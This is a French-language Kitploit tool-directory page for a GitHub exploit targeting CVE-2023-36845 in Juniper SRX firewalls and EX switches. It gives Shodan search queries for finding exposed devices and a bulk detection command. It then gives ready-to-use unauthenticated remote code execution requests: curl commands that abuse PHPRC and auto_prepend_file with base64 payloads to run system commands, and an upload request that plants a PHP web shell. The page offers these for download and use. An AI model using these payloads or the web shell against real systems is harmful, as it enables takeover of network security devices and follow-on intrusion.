Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-36845 — Juniper Firewalls CVE-2023-36845 - RCE | Kitploit
Outils/GitHubGitHub/kljunowsky/cve-2023-36845
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubkljunowsky/cve-2023-36845

CVE-2023-36845

Juniper Firewalls CVE-2023-36845 - RCE

Voir le dépôt
5513il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-36845

Description

CVE-2023-36845 représente une vulnérabilité notable de manipulation de variables d'environnement PHP qui impacte les pare-feu Juniper SRX et les commutateurs EX. Bien que Juniper ait classé cette vulnérabilité comme étant de sévérité moyenne, dans cet article, nous expliquerons comment cette seule vulnérabilité peut être exploitée pour une exécution de code à distance sans authentification.

Recherche - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
image
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
image

Utilisation 🛠

Détection

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

Option 1

Il est possible d'utiliser n'importe quel wrapper de protocole conjointement avec auto_prepend_file. Le choix le plus approprié pour cette opération est le protocole data://, qui permet de fournir le « fichier secondaire » en ligne. Voici une représentation sophistiquée de cette exploitation, exécutant le <? phpinfo(); ?> intégré dans le schéma data:// :

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

Exécuter la commande whoami

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

Option 2

Télécharger un fichier

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

Paramètres 🧰

ParamètreDescriptionType
--file / -fFichier d'entrée des ciblesFichier
-oFichier de sortieFichier

Me contacter 📇

LinkedIn - Milan Jovic

Télécharger l’outil